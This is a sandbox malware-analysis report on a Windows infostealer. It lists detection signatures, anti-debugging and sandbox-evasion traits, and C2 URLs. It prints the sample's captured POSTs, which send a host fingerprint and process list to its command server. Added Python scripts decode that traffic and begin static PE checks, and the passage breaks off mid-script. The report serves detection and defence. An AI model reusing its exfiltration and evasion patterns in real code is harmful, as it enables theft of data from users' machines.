
Windows Analysis Report
HZhObFuFNe.exe

Overview

General Information

Sample name: HZhObFuFNe.exe (renamed because the original name is a hash value)
Original sample name: 2ba7ee5357b8762915d320630e9a59b7.exe
Analysis ID: 1578913
MD5: 2ba7ee5357b8762915d320630e9a59b7
SHA1: f4995defaafe3b084242e2b9f382c7b379938420
SHA256: 9249b72e3a0443ec9df0569d0a3fbe76c52d21c1b5d69f9dfb41d40b819e3181
Tags: exe, user-abuse_ch

Detection

Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Hides threads from debuggers
Infostealer behavior detected
Leaks process information
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to create an SMB header
Detected potential crypto function
Entry point lies outside standard sections
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • HZhObFuFNe.exe (PID: 7696 cmdline: "C:\Users\user\Desktop\HZhObFuFNe.exe" MD5: 2BA7EE5357B8762915D320630E9A59B7)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: HZhObFuFNe.exe | Avira: detected
Source: HZhObFuFNe.exe | Virustotal: Detection: 63%
Source: HZhObFuFNe.exe | ReversingLabs: Detection: 57%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: HZhObFuFNe.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C4DCF0 (references the string -----BEGIN PUBLIC KEY-----)
Source: HZhObFuFNe.exe | Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C8A5B0: mov dword ptr [ebp+04h], 424D53FFh
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C8A7F0: mov dword ptr [ebx+04h], 424D53FFh (2x); mov dword ptr [edi+04h], 424D53FFh (2x); mov dword ptr [esi+04h], 424D53FFh (2x)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C8B560: mov dword ptr [ebx+04h], 424D53FFh
(0x424D53FF written little-endian is the byte sequence FF 53 4D 42, i.e. "\xFFSMB", the protocol identifier at the start of an SMB1 header; this is what the "Contains functionality to create an SMB header" signature keys on.)
Source: HZhObFuFNe.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C2255D: GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C229FF: FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: global traffic | HTTP traffic detected: GET /ip HTTP/1.1 | Host: httpbin.org | Accept: */*
Source: global traffic | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 | Host: home.fivetk5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 444282 | Data Raw (truncated in the report): 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 39 32 35 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 69 73 74 72 79 22 2c 20 22 70 69 64 22 3a 20 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 31 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 69 6e 69 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 38 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 63 73 72 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 39 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 35 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 65 72 76 69 63 65 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 33 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 66 6f 6e 74 64 72 76 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 38 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 38 38 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 32 38 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 64 77 6d 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 39 39 32 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 34 33 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 37 36 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3 | Data Ascii (truncated): { "ip": "8.46.123.189", "current_time": "1734708925", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 584 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 880 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name"
Source: global traffic | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 | Host: home.fivetk5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 143 | Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d | Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
Source: Joe Sandbox View | IP Address: 185.121.15.192
Source: Joe Sandbox View | IP Address: 98.85.100.80
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (6 times)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00CEA8C0: recvfrom
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: global traffic | DNS traffic detected: DNS query: home.fivetk5ht.top
Source: unknown | HTTP traffic detected: POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1 | Host: home.fivetk5ht.top | Accept: */* | Content-Type: application/json | Content-Length: 444282 | Data Raw / Data Ascii: identical to the 444282-byte POST listed above
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.css
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://.jpg
Source: HZhObFuFNe.exe, 00000000.00000003.1486137662.0000000001E01000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPR
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: HZhObFuFNe.exe, 00000000.00000003.1487211287.0000000001DA8000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487578348.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487134629.0000000001DA3000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1498497294.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: HZhObFuFNe.exe, 00000000.00000003.1487211287.0000000001DA8000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487134629.0000000001DA3000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv173457985135a1
Source: HZhObFuFNe.exe, 00000000.00000003.1487211287.0000000001DA8000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487578348.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000003.1487134629.0000000001DA3000.00000004.00000020.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1498497294.0000000001DAA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17345798516963
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://html4/loose.dtd
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/alt-svc.html
Source: HZhObFuFNe.exe | String found in binary or memory: https://curl.se/docs/alt-svc.html#
Source: HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/hsts.html
Source: HZhObFuFNe.exe | String found in binary or memory: https://curl.se/docs/hsts.html#
Source: HZhObFuFNe.exe, HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ip
Source: HZhObFuFNe.exe, 00000000.00000003.1399095536.0000000007A36000.00000004.00001000.00020000.00000000.sdmp, HZhObFuFNe.exe, 00000000.00000002.1497129879.00000000011FD000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://httpbin.org/ipbefore
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
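The two POSTs above carry the host fingerprint the sample builds before talking to its C2, and the report prints the 444282-byte body as a hex dump that stops mid-stream. The field names line up with the API sequence in function 0_2_00C2255D (GetSystemInfo for Num_processor, GlobalMemoryStatusEx for Num_ram, GetDriveTypeA/GetDiskFreeSpaceExA for drivers, FindFirstFileW for recent_files, K32EnumProcesses for processes), and the second POST echoes the server's 503 error page back in the id1 field, which suggests the client stores whatever body the first POST returns as an identifier without checking the status code. The script below is an added example for this report, not Joe Sandbox code and not code from the sample: it parses the request head, flags the missing User-Agent, decodes the "Data Raw" hex and closes the truncated JSON at the last complete element so the fields remain readable. The request heads and the hex are copied from the report (the first body is an excerpt of the report's already-truncated dump; the 143-byte second body is complete).

```python
"""Decode and triage the C2 POSTs from the Joe Sandbox 'Data Raw' dumps above.

Added example for this report; not Joe Sandbox code and not code from the
sample. Inputs are copied from the report: the request head of the first
POST, an excerpt of its (already truncated) hex body, and the full body of
the second POST.
"""
import json

# Request head of the first POST, as listed in the report (no User-Agent).
FIRST_HEAD = (
    "POST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1\r\n"
    "Host: home.fivetk5ht.top\r\n"
    "Accept: */*\r\n"
    "Content-Type: application/json\r\n"
    "Content-Length: 444282\r\n"
)

# Excerpt of the first POST's 'Data Raw' (report bytes; the trailing '3' is
# the half byte at which the report's dump stops).
FIRST_DATA_RAW = (
    "7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 "
    "22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 38 39 32 35 22 2c 20 "
    "22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 "
    "22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 "
    "22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 "
    "22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 "
    "7b 20 22 6e 61 6d 65 22 3a 20 22 73 6d 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 33 32 38 20 7d 2c 20 "
    "7b 20 22 6e 61 6d 65 22 3a 20 22 6c 73 61 73 73 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 36 34 30 20 7d 2c 20 "
    "7b 20 22 6e 61 6d 65 22 3a 20 22 73 76 63 68 6f 73 74 2e 65 78 65 22 2c 20 22 70 69 64 22 3a 20 37 35 32 20 7d 2c 20 "
    "7b 20 22 6e 61 6d 65 22 3"
)

# Second POST: same head apart from the length; body copied in full (143 bytes).
SECOND_HEAD = FIRST_HEAD.replace("Content-Length: 444282", "Content-Length: 143")
SECOND_DATA_RAW = (
    "7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 "
    "53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 "
    "73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 "
    "74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e "
    "5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d"
)


def decode_data_raw(dump: str) -> bytes:
    """Report hex dump -> bytes. A trailing single hex digit (cut-off byte) is dropped."""
    return bytes(int(tok, 16) for tok in dump.split() if len(tok) == 2)


def parse_request_head(head: str):
    """Return (method, path, headers) with header names lower-cased."""
    lines = [ln for ln in head.split("\r\n") if ln]
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def recover_truncated_json(text: str):
    """Parse JSON that may be cut off anywhere (even inside a string).

    One scan tracks string/escape state and the stack of open brackets and
    remembers the last ',' seen outside a string together with the stack at
    that point. If a normal parse fails, the text is cut just before that
    comma and the still-open brackets are closed, giving the longest prefix
    made of complete elements.
    """
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        pass
    stack, in_str, esc = [], False, False
    cut, cut_stack = None, []
    for i, ch in enumerate(text):
        if in_str:
            if esc:
                esc = False
            elif ch == "\\":
                esc = True
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
        elif ch in "{[":
            stack.append("}" if ch == "{" else "]")
        elif ch in "}]" and stack:
            stack.pop()
        elif ch == ",":
            cut, cut_stack = i, list(stack)
    if cut is None:
        raise ValueError("no complete JSON element before the cut")
    return json.loads(text[:cut] + "".join(reversed(cut_stack)))


def triage_post(head: str, data_raw: str) -> dict:
    """Flag the C2-style traits of one POST and return its decoded body."""
    method, path, headers = parse_request_head(head)
    body = decode_data_raw(data_raw)
    declared = int(headers.get("content-length", "0"))
    findings = []
    if method == "POST" and "user-agent" not in headers:
        findings.append("POST without User-Agent")
    if headers.get("content-type", "").startswith("application/json"):
        findings.append("JSON body")
    if len(body) < declared:
        findings.append("body truncated in capture")
    return {
        "host": headers.get("host"),
        "path": path,
        "declared_length": declared,
        "captured_length": len(body),
        "findings": findings,
        "body": recover_truncated_json(body.decode("utf-8", "replace")),
    }


if __name__ == "__main__":
    for head, raw in ((FIRST_HEAD, FIRST_DATA_RAW), (SECOND_HEAD, SECOND_DATA_RAW)):
        r = triage_post(head, raw)
        print(r["host"], r["path"], r["findings"])
        print(json.dumps(r["body"], indent=1)[:400])
```

On a full PCAP the same functions apply to the complete body; recover_truncated_json only falls back to cutting when json.loads fails, so complete bodies are returned unchanged.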

System Summary

Source: HZhObFuFNe.exe | Static PE information: section name: (blank / non-printable)
Source: HZhObFuFNe.exe | Static PE information: section name: .idata
Source: HZhObFuFNe.exe | Static PE information: section name: (blank / non-printable)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code functions: 0_3_01DDEDD5, 0_3_01DE17C1, 0_3_01DE1ABF, 0_3_01DD5B50 (listed 4x), 0_3_01DD5B60, 0_3_01DE1D15, 0_3_01DE1821
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code functions (all 0_2_): 00C305B0, 00C36FA0, 00CEB180, 00C5F100, 00CF00E0, 00FAE030, 00C86210, 00CEC320, 00F74410, 00CF0420, 00C2E620, 00C8A7F0, 00FA4780, 00CEC770, 00F86730, 00C34940, 00C2A960, 00CDC900, 00DF6AC0, 00EDAAC0, 00F98BF0, 00C2CBB0, 00DB4B60, 00EDAB2C, 00FACC70, 00F9CD80, 00FA4D40, 00F3AE30, 00CEEF90, 00CE8F90, 00F72F90, 00C44F70, 00C310E6, 00C8F10D, 00F8D430, 00F935B0, 00F756D0, 00FB1780, 00CD9880, 00F79920, 00FA3A70, 00C61BE0, 00F91BD0, 00F87CC0, 00ED9C80
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00DFCBC0 appears 95 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C2CAA0 appears 64 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C271E0 appears 45 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C3CD40 appears 78 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C650A0 appears 90 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C64FD0 appears 251 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00DD7220 appears 91 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C65340 appears 45 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C64F40 appears 314 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C275A0 appears 633 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C3CCD0 appears 55 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C273F0 appears 106 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00C2C960 appears 32 times
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: String function: 00D044A0 appears 68 times
Source: HZhObFuFNe.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: HZhObFuFNe.exe | Static PE information: Section: vdxoyfiw ZLIB complexity 0.9943814589799661
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@6/2
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C2255D: GetSystemInfo, GlobalMemoryStatusEx, GetDriveTypeA, GetDiskFreeSpaceExA, KiUserCallbackDispatcher, FindFirstFileW, FindNextFileW, K32EnumProcesses
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_2_00C229FF: FindFirstFileA, RegOpenKeyExA, CharUpperA, CreateToolhelp32Snapshot, QueryFullProcessImageNameA, CloseHandle, CreateToolhelp32Snapshot, CloseHandle
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | File read: C:\Windows\System32\drivers\etc\hosts (3 times)
Source: HZhObFuFNe.exe | Virustotal: Detection: 63%
Source: HZhObFuFNe.exe | ReversingLabs: Detection: 57%
Source: HZhObFuFNe.exe | String found in binary or memory: Unable to complete request for channel-process-startup
Source: HZhObFuFNe.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Sections loaded, in order: apphelp.dll, winmm.dll, iphlpapi.dll, cryptbase.dll, cryptsp.dll, rsaenh.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, winrnr.dll, uxtheme.dll, windows.storage.dll, wldp.dll, windowscodecs.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, kernel.appcore.dll
Source: HZhObFuFNe.exe | Static file information: File size 4470784 > 1048576
Source: HZhObFuFNe.exe | Static PE information: Raw size of the blank-named section is bigger than: 0x100000 < 0x284c00
Source: HZhObFuFNe.exe | Static PE information: Raw size of vdxoyfiw is bigger than: 0x100000 < 0x1bb000

Data Obfuscation

Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Unpacked PE file: 0.2.HZhObFuFNe.exe.c20000.0.unpack | section rights in the unpacked dump: (blank):EW; .rsrc:W; .idata:W; (blank):EW; vdxoyfiw:EW; lxmogbqr:EW; .taggant:EW | vs the original file: (blank):ER; .rsrc:W; .idata:W; (blank):EW; vdxoyfiw:EW; lxmogbqr:EW; .taggant:EW (E = executable, W = writable, R = readable; the first blank-named section goes from executable/readable on disk to executable/writable at runtime, which is what the "changes PE section rights" signature keys on)
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: HZhObFuFNe.exe | Static PE information: real checksum: 0x448b1e should be: 0x44440d
Source: HZhObFuFNe.exe | Static PE information: section name: (blank / non-printable)
Source: HZhObFuFNe.exe | Static PE information: section name: .idata
Source: HZhObFuFNe.exe | Static PE information: section name: (blank / non-printable)
Source: HZhObFuFNe.exe | Static PE information: section name: vdxoyfiw
Source: HZhObFuFNe.exe | Static PE information: section name: lxmogbqr
Source: HZhObFuFNe.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01E1749C push eax; ret 0_3_01E1749D (4x)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01E1F158 push ebx; iretd 0_3_01E1F159 (6x)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01E29C1D push ecx; ret 0_3_01E29C1F (2x)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01DD33D8 push edi; ret 0_3_01DD347A
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01DD3289 push edi; ret 0_3_01DD347A (4x)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01DD34A0 push edi; retf 0_3_01DD34BA (4x)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01DE13A0 pushad; iretd 0_3_01DE13A1
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01DD5B50 push esi; retn 0047h 0_3_01DD5F7A (4x)
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01DD8578 push 00000040h; ret 0_3_01DD8892
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01DD5B60 push esi; retn 0047h 0_3_01DD5F7A
Source: C:\Users\user\Desktop\HZhObFuFNe.exe | Code function: 0_3_01DD8623 push 00000040h; ret 0_3_01DD8892 (3x)
Source: HZhObFuFNe.exe | Static PE information: section name: vdxoyfiw entropy: 7.95517720558757
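The three static findings in this section (entry point inside .taggant rather than a standard section, vdxoyfiw at entropy 7.955, a stored checksum of 0x448b1e against a recomputed 0x44440d) can be reproduced with the standard library alone. The script below is an added example for this report, not Joe Sandbox code and not the sample's code: because the sample itself is not on this page, it runs its checks against a small PE32 image it builds in memory using the report's section names, so the layout, sizes and the resulting numbers are assumptions and differ from the report.

```python
"""Static checks behind three 'Data Obfuscation' findings: entry point in a
non-standard section, a near-8.0-entropy section, and a checksum mismatch.
Added example for this report (not Joe Sandbox code); standard library only.
The sample is not on this page, so the checks run on a PE32 built in memory
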